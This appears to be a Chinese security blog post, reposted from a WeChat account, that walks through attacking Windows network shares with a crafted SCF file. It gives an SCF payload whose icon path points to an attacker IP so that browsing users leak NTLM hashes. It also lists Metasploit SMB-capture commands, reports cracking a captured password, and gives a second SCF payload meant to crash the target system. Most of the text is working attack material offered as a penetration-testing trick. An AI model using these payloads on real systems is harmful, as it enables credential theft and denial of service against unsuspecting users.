通过学习看雪一篇文章对SCF文件利用攻击网络共享文件夹,由于原文有些地方没有提及,于是便尝试了一下复现,个人认为在内网渗透中某些技巧灵活运用起来能事半功倍,多学习一种新方式,就可能多一种新思路
1. 通过创建SCF文件指向攻击者ip
2. 创建共享文件夹放入SCF文件并设置权限为公共访问
3. 浏览或上传文件到目标系统成功获取到用户系统HASH
通过创建SCF文件,修改其中地址为攻击者ip
[Shell]
Command=2
IconFile=\192.168.1.214sharetest.ico
[Taskbar]
Command=ToggleDesktop
创建共享文件夹并设置权限
监听smb服务
use auxiliary/server/capture/smb
设置HASH密码保存地址
set JOHNPWFILE xxxxx
通过浏览文件夹成功获取到用户系统密码
得到访问者电脑系统密码
第一列为用户密码,第二列为系统用户登录名
由此成功破解密码为aasron
提示:
1.攻击目标死机SCF文件,根据原文解释无需攻击者或被攻击者操作
[Shell]
Command=2
IconFile= c:$MFT123
[Taskbar]
Command=ToggleDesktop2.如果指定攻击某台系统需要对方开启写入权限并写入文件、否则则要使用本机上传SCF文件并诱使被攻击者访问
本文始发于微信公众号(T00ls):【奇技淫巧】通过SCF文件攻击网络共享文件夹并获取用户系统密码
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论